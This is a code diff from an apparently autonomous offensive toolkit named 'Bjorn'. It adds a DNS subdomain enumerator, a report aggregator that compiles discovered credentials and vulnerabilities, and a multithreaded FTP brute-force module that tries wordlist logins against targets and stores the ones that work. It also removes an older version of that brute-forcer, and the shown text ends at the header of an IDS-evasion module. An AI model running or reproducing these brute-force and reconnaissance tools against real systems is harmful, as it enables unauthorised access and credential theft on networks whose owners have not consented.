# -r, --recursive Enable recursive enumeration of discovered subdomains.
import os
import json
import dns.resolver
import threading
import argparse
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
import logging
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
b_class = "DNSPillager"
b_module = "dns_pillager"
b_enabled = 0
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/dns"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "dns_pillager_settings.json")
DEFAULT_RECORD_TYPES = ['A', 'AAAA', 'MX', 'NS', 'TXT', 'CNAME', 'SOA']
class DNSPillager:
def __init__(self, domain, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, recursive=False):
self.domain = domain
self.wordlist = wordlist
self.output_dir = output_dir
self.threads = threads
self.recursive = recursive
self.discovered_domains = set()
self.lock = threading.Lock()
self.resolver = dns.resolver.Resolver()
self.resolver.timeout = 1
self.resolver.lifetime = 1
def save_results(self, results):
"""Save enumeration results to a JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(self.output_dir, f"dns_enum_{timestamp}.json")
with open(filename, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {filename}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def query_domain(self, domain, record_type):
"""Query a domain for specific DNS record type."""
try:
answers = self.resolver.resolve(domain, record_type)
return [str(answer) for answer in answers]
except:
return []
def enumerate_domain(self, subdomain):
"""Enumerate a single subdomain for all record types."""
full_domain = f"{subdomain}.{self.domain}" if subdomain else self.domain
results = {'domain': full_domain, 'records': {}}
for record_type in DEFAULT_RECORD_TYPES:
records = self.query_domain(full_domain, record_type)
if records:
results['records'][record_type] = records
with self.lock:
self.discovered_domains.add(full_domain)
logging.info(f"Found {record_type} records for {full_domain}")
return results if results['records'] else None
def load_wordlist(self):
"""Load subdomain wordlist or use built-in list."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r') as f:
return [line.strip() for line in f if line.strip()]
return ['www', 'mail', 'remote', 'blog', 'webmail', 'server', 'ns1', 'ns2', 'smtp', 'secure']
def execute(self):
"""Execute the DNS enumeration process."""
results = {'timestamp': datetime.now().isoformat(), 'findings': []}
subdomains = self.load_wordlist()
logging.info(f"Starting DNS enumeration for {self.domain}")
with ThreadPoolExecutor(max_workers=self.threads) as executor:
enum_results = list(filter(None, executor.map(self.enumerate_domain, subdomains)))
results['findings'].extend(enum_results)
if self.recursive and self.discovered_domains:
logging.info("Starting recursive enumeration")
new_domains = set()
for domain in self.discovered_domains:
if domain != self.domain:
new_subdomains = [d.split('.')[0] for d in domain.split('.')[:-2]]
new_domains.update(new_subdomains)
if new_domains:
enum_results = list(filter(None, executor.map(self.enumerate_domain, new_domains)))
results['findings'].extend(enum_results)
self.save_results(results)
return results
def save_settings(domain, wordlist, output_dir, threads, recursive):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"domain": domain,
"wordlist": wordlist,
"output_dir": output_dir,
"threads": threads,
"recursive": recursive
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="DNS Pillager for domain reconnaissance")
parser.add_argument("-d", "--domain", help="Target domain for enumeration")
parser.add_argument("-w", "--wordlist", help="Path to subdomain wordlist")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for results")
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
parser.add_argument("-r", "--recursive", action="store_true", help="Enable recursive enumeration")
args = parser.parse_args()
settings = load_settings()
domain = args.domain or settings.get("domain")
wordlist = args.wordlist or settings.get("wordlist")
output_dir = args.output or settings.get("output_dir")
threads = args.threads or settings.get("threads")
recursive = args.recursive or settings.get("recursive")
if not domain:
logging.error("Domain is required. Use -d or save it in settings")
return
save_settings(domain, wordlist, output_dir, threads, recursive)
pillager = DNSPillager(
domain=domain,
wordlist=wordlist,
output_dir=output_dir,
threads=threads,
recursive=recursive
)
pillager.execute()
if __name__ == "__main__":
main()

457
actions/freya_harvest.py Normal file
View File

@@ -0,0 +1,457 @@
# Data collection and organization tool to aggregate findings from other modules.
# Saves settings in `/home/bjorn/.settings_bjorn/freya_harvest_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --input Input directory to monitor (default: /home/bjorn/Bjorn/data/output/).
# -o, --output Output directory for reports (default: /home/bjorn/Bjorn/data/reports).
# -f, --format Output format (json, html, md, default: all).
# -w, --watch Watch for new findings in real-time.
# -c, --clean Clean old data before processing.
import os
import json
import argparse
from datetime import datetime
import logging
import time
import shutil
import glob
import watchdog.observers
import watchdog.events
import markdown
import jinja2
from collections import defaultdict
b_class = "FreyaHarvest"
b_module = "freya_harvest"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_INPUT_DIR = "/home/bjorn/Bjorn/data/output"
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/reports"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "freya_harvest_settings.json")
# HTML template for reports
HTML_TEMPLATE = """
<!DOCTYPE html>
<html>
<head>
<title>Bjorn Reconnaissance Report</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
.section { margin: 20px 0; padding: 10px; border: 1px solid #ddd; }
.vuln-high { background-color: #ffebee; }
.vuln-medium { background-color: #fff3e0; }
.vuln-low { background-color: #f1f8e9; }
table { border-collapse: collapse; width: 100%; margin-bottom: 20px; }
th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
th { background-color: #f5f5f5; }
h1, h2, h3 { color: #333; }
.metadata { color: #666; font-style: italic; }
.timestamp { font-weight: bold; }
</style>
</head>
<body>
<h1>Bjorn Reconnaissance Report</h1>
<div class="metadata">
<p class="timestamp">Generated: {{ timestamp }}</p>
</div>
{% for section in sections %}
<div class="section">
<h2>{{ section.title }}</h2>
{{ section.content }}
</div>
{% endfor %}
</body>
</html>
"""
class FreyaHarvest:
def __init__(self, input_dir=DEFAULT_INPUT_DIR, output_dir=DEFAULT_OUTPUT_DIR,
formats=None, watch_mode=False, clean=False):
self.input_dir = input_dir
self.output_dir = output_dir
self.formats = formats or ['json', 'html', 'md']
self.watch_mode = watch_mode
self.clean = clean
self.data = defaultdict(list)
self.observer = None
def clean_directories(self):
"""Clean output directory if requested."""
if self.clean and os.path.exists(self.output_dir):
shutil.rmtree(self.output_dir)
os.makedirs(self.output_dir)
logging.info(f"Cleaned output directory: {self.output_dir}")
def collect_wifi_data(self):
"""Collect WiFi-related findings."""
try:
wifi_dir = os.path.join(self.input_dir, "wifi")
if os.path.exists(wifi_dir):
for file in glob.glob(os.path.join(wifi_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['wifi'].append(data)
except Exception as e:
logging.error(f"Error collecting WiFi data: {e}")
def collect_network_data(self):
"""Collect network topology and host findings."""
try:
network_dir = os.path.join(self.input_dir, "topology")
if os.path.exists(network_dir):
for file in glob.glob(os.path.join(network_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['network'].append(data)
except Exception as e:
logging.error(f"Error collecting network data: {e}")
def collect_vulnerability_data(self):
"""Collect vulnerability findings."""
try:
vuln_dir = os.path.join(self.input_dir, "webscan")
if os.path.exists(vuln_dir):
for file in glob.glob(os.path.join(vuln_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['vulnerabilities'].append(data)
except Exception as e:
logging.error(f"Error collecting vulnerability data: {e}")
def collect_credential_data(self):
"""Collect credential findings."""
try:
cred_dir = os.path.join(self.input_dir, "packets")
if os.path.exists(cred_dir):
for file in glob.glob(os.path.join(cred_dir, "*.json")):
with open(file, 'r') as f:
data = json.load(f)
self.data['credentials'].append(data)
except Exception as e:
logging.error(f"Error collecting credential data: {e}")
def collect_data(self):
"""Collect all data from various sources."""
self.data.clear() # Reset data before collecting
self.collect_wifi_data()
self.collect_network_data()
self.collect_vulnerability_data()
self.collect_credential_data()
logging.info("Data collection completed")
def generate_json_report(self):
"""Generate JSON format report."""
try:
report = {
'timestamp': datetime.now().isoformat(),
'findings': dict(self.data)
}
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.json")
with open(output_file, 'w') as f:
json.dump(report, f, indent=4)
logging.info(f"JSON report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating JSON report: {e}")
def generate_html_report(self):
"""Generate HTML format report."""
try:
template = jinja2.Template(HTML_TEMPLATE)
sections = []
# Network Section
if self.data['network']:
content = "<h3>Network Topology</h3>"
for topology in self.data['network']:
content += f"<p>Hosts discovered: {len(topology.get('hosts', []))}</p>"
content += "<table><tr><th>IP</th><th>MAC</th><th>Open Ports</th><th>Status</th></tr>"
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
content += f"<tr><td>{ip}</td><td>{mac}</td><td>{', '.join(map(str, ports))}</td><td>{status}</td></tr>"
content += "</table>"
sections.append({"title": "Network Information", "content": content})
# WiFi Section
if self.data['wifi']:
content = "<h3>WiFi Findings</h3>"
for wifi_data in self.data['wifi']:
content += "<table><tr><th>SSID</th><th>BSSID</th><th>Security</th><th>Signal</th><th>Channel</th></tr>"
for network in wifi_data.get('networks', []):
content += f"<tr><td>{network.get('ssid', 'Unknown')}</td>"
content += f"<td>{network.get('bssid', 'Unknown')}</td>"
content += f"<td>{network.get('security', 'Unknown')}</td>"
content += f"<td>{network.get('signal_strength', 'Unknown')}</td>"
content += f"<td>{network.get('channel', 'Unknown')}</td></tr>"
content += "</table>"
sections.append({"title": "WiFi Networks", "content": content})
# Vulnerabilities Section
if self.data['vulnerabilities']:
content = "<h3>Discovered Vulnerabilities</h3>"
for vuln_data in self.data['vulnerabilities']:
content += "<table><tr><th>Type</th><th>Severity</th><th>Target</th><th>Description</th><th>Recommendation</th></tr>"
for vuln in vuln_data.get('findings', []):
severity_class = f"vuln-{vuln.get('severity', 'low').lower()}"
content += f"<tr class='{severity_class}'>"
content += f"<td>{vuln.get('type', 'Unknown')}</td>"
content += f"<td>{vuln.get('severity', 'Unknown')}</td>"
content += f"<td>{vuln.get('target', 'Unknown')}</td>"
content += f"<td>{vuln.get('description', 'No description')}</td>"
content += f"<td>{vuln.get('recommendation', 'No recommendation')}</td></tr>"
content += "</table>"
sections.append({"title": "Vulnerabilities", "content": content})
# Credentials Section
if self.data['credentials']:
content = "<h3>Discovered Credentials</h3>"
content += "<table><tr><th>Type</th><th>Source</th><th>Service</th><th>Username</th><th>Timestamp</th></tr>"
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
content += f"<tr><td>{cred.get('type', 'Unknown')}</td>"
content += f"<td>{cred.get('source', 'Unknown')}</td>"
content += f"<td>{cred.get('service', 'Unknown')}</td>"
content += f"<td>{cred.get('username', 'Unknown')}</td>"
content += f"<td>{cred.get('timestamp', 'Unknown')}</td></tr>"
content += "</table>"
sections.append({"title": "Credentials", "content": content})
# Generate HTML
os.makedirs(self.output_dir, exist_ok=True)
html = template.render(
timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
sections=sections
)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.html")
with open(output_file, 'w') as f:
f.write(html)
logging.info(f"HTML report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating HTML report: {e}")
def generate_markdown_report(self):
"""Generate Markdown format report."""
try:
md_content = [
"# Bjorn Reconnaissance Report",
f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
]
# Network Section
if self.data['network']:
md_content.append("## Network Information")
for topology in self.data['network']:
md_content.append(f"\nHosts discovered: {len(topology.get('hosts', []))}")
md_content.append("\n| IP | MAC | Open Ports | Status |")
md_content.append("|-------|-------|------------|---------|")
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
md_content.append(f"| {ip} | {mac} | {', '.join(map(str, ports))} | {status} |")
# WiFi Section
if self.data['wifi']:
md_content.append("\n## WiFi Networks")
md_content.append("\n| SSID | BSSID | Security | Signal | Channel |")
md_content.append("|------|--------|-----------|---------|----------|")
for wifi_data in self.data['wifi']:
for network in wifi_data.get('networks', []):
md_content.append(
f"| {network.get('ssid', 'Unknown')} | "
f"{network.get('bssid', 'Unknown')} | "
f"{network.get('security', 'Unknown')} | "
f"{network.get('signal_strength', 'Unknown')} | "
f"{network.get('channel', 'Unknown')} |"
)
# Vulnerabilities Section
if self.data['vulnerabilities']:
md_content.append("\n## Vulnerabilities")
md_content.append("\n| Type | Severity | Target | Description | Recommendation |")
md_content.append("|------|-----------|--------|-------------|----------------|")
for vuln_data in self.data['vulnerabilities']:
for vuln in vuln_data.get('findings', []):
md_content.append(
f"| {vuln.get('type', 'Unknown')} | "
f"{vuln.get('severity', 'Unknown')} | "
f"{vuln.get('target', 'Unknown')} | "
f"{vuln.get('description', 'No description')} | "
f"{vuln.get('recommendation', 'No recommendation')} |"
)
# Credentials Section
if self.data['credentials']:
md_content.append("\n## Discovered Credentials")
md_content.append("\n| Type | Source | Service | Username | Timestamp |")
md_content.append("|------|---------|----------|-----------|------------|")
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
md_content.append(
f"| {cred.get('type', 'Unknown')} | "
f"{cred.get('source', 'Unknown')} | "
f"{cred.get('service', 'Unknown')} | "
f"{cred.get('username', 'Unknown')} | "
f"{cred.get('timestamp', 'Unknown')} |"
)
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.md")
with open(output_file, 'w') as f:
f.write('\n'.join(md_content))
logging.info(f"Markdown report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating Markdown report: {e}")
def generate_reports(self):
"""Generate reports in all specified formats."""
os.makedirs(self.output_dir, exist_ok=True)
if 'json' in self.formats:
self.generate_json_report()
if 'html' in self.formats:
self.generate_html_report()
if 'md' in self.formats:
self.generate_markdown_report()
def start_watching(self):
"""Start watching for new data files."""
class FileHandler(watchdog.events.FileSystemEventHandler):
def __init__(self, harvester):
self.harvester = harvester
def on_created(self, event):
if event.is_directory:
return
if event.src_path.endswith('.json'):
logging.info(f"New data file detected: {event.src_path}")
self.harvester.collect_data()
self.harvester.generate_reports()
self.observer = watchdog.observers.Observer()
self.observer.schedule(FileHandler(self), self.input_dir, recursive=True)
self.observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
self.observer.stop()
self.observer.join()
def execute(self):
"""Execute the data collection and reporting process."""
try:
logging.info("Starting data collection")
if self.clean:
self.clean_directories()
# Initial data collection and report generation
self.collect_data()
self.generate_reports()
# Start watch mode if enabled
if self.watch_mode:
logging.info("Starting watch mode for new data")
try:
self.start_watching()
except KeyboardInterrupt:
logging.info("Watch mode stopped by user")
finally:
if self.observer:
self.observer.stop()
self.observer.join()
logging.info("Data collection and reporting completed")
except Exception as e:
logging.error(f"Error during execution: {e}")
raise
finally:
# Ensure observer is stopped if watch mode was active
if self.observer and self.observer.is_alive():
self.observer.stop()
self.observer.join()
def save_settings(input_dir, output_dir, formats, watch_mode, clean):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"input_dir": input_dir,
"output_dir": output_dir,
"formats": formats,
"watch_mode": watch_mode,
"clean": clean
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Data collection and organization tool")
parser.add_argument("-i", "--input", default=DEFAULT_INPUT_DIR, help="Input directory to monitor")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for reports")
parser.add_argument("-f", "--format", choices=['json', 'html', 'md', 'all'], default='all',
help="Output format")
parser.add_argument("-w", "--watch", action="store_true", help="Watch for new findings")
parser.add_argument("-c", "--clean", action="store_true", help="Clean old data before processing")
args = parser.parse_args()
settings = load_settings()
input_dir = args.input or settings.get("input_dir")
output_dir = args.output or settings.get("output_dir")
formats = ['json', 'html', 'md'] if args.format == 'all' else [args.format]
watch_mode = args.watch or settings.get("watch_mode", False)
clean = args.clean or settings.get("clean", False)
save_settings(input_dir, output_dir, formats, watch_mode, clean)
harvester = FreyaHarvest(
input_dir=input_dir,
output_dir=output_dir,
formats=formats,
watch_mode=watch_mode,
clean=clean
)
harvester.execute()
if __name__ == "__main__":
main()

268
actions/ftp_bruteforce.py Normal file
View File

@@ -0,0 +1,268 @@
"""
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='ftp')
- Conserve la logique dorigine (queue/threads, sleep éventuels, etc.)
"""
import os
import threading
import logging
import time
from ftplib import FTP
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_bruteforce"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
b_service = '["ftp"]'
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
b_priority = 70
b_cooldown = 1800, # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class FTPBruteforce:
"""Wrapper orchestrateur -> FTPConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_bruteforce = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""Lance le bruteforce FTP pour (ip, port)."""
return self.ftp_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "FTPBruteforce"
# comportement original : un petit délai visuel
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""Gère les tentatives FTP, persistance DB, mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- FTP ----------
def ftp_connect(self, adresse_ip: str, user: str, password: str) -> bool:
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
try:
conn.quit()
except Exception:
pass
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception:
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ftp',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ftp'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for FTP bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
self.queue.task_done()
# Pause configurable entre chaque tentative FTP
if getattr(self.shared_data, "timewait_ftp", 0) > 0:
time.sleep(self.shared_data.timewait_ftp)
def run_bruteforce(self, adresse_ip: str, port: int):
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords) + 1 # (logique d'origine conservée)
if len(self.users) * len(self.passwords) == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
thread_count = min(40, max(1, len(self.users) * len(self.passwords)))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results
# ---------- persistence DB ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="ftp",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
def removeduplicates(self):
pass
if __name__ == "__main__":
try:
sd = SharedData()
ftp_bruteforce = FTPBruteforce(sd)
logger.info("FTP brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,190 +0,0 @@
import os
import pandas as pd
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from ftplib import FTP
from queue import Queue
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_connector.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_connector"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
class FTPBruteforce:
"""
This class handles the FTP brute force attack process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_connector = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""
Initiates the brute force attack on the given IP and port.
"""
return self.ftp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Executes the brute force attack and updates the shared data status.
"""
self.shared_data.bjornorch_status = "FTPBruteforce"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""
This class manages the FTP connection attempts using different usernames and passwords.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.ftpfile = shared_data.ftpfile
if not os.path.exists(self.ftpfile):
logger.info(f"File {self.ftpfile} does not exist. Creating...")
with open(self.ftpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for FTP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
def ftp_connect(self, adresse_ip, user, password):
"""
Attempts to connect to the FTP server using the provided username and password.
"""
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
conn.quit()
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords) + 1 # Include one for the anonymous attempt
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing FTP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Saves the results of successful FTP connections to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.ftpfile, index=False, mode='a', header=not os.path.exists(self.ftpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Removes duplicate entries from the results file.
"""
df = pd.read_csv(self.ftpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.ftpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ftp_bruteforce = FTPBruteforce(shared_data)
logger.info("[bold green]Starting FTP attack...on port 21[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
ftp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(ftp_bruteforce.ftp_connector.results)}")
exit(len(ftp_bruteforce.ftp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

318
actions/heimdall_guard.py Normal file
View File

@@ -0,0 +1,318 @@
# Stealth operations module for IDS/IPS evasion and traffic manipulation.a
